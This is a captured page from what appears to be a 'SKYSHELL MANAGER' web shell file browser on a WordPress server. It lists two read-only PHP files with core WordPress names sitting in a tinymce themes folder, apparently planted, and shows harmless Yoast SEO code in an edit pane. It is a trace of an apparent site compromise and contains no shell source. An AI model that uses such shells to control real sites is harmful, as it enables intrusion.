📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: loadable.php
<?php /** * Integration interface definition. * * @package Yoast\YoastSEO\WordPress */ namespace Yoast\WP\Free\WordPress; /** * An interface for registering integrations with WordPress */ interface Loadable { /** * Returns the conditionals based in which this loadable should be active. * * @return array */ public static function get_conditionals(); }
Save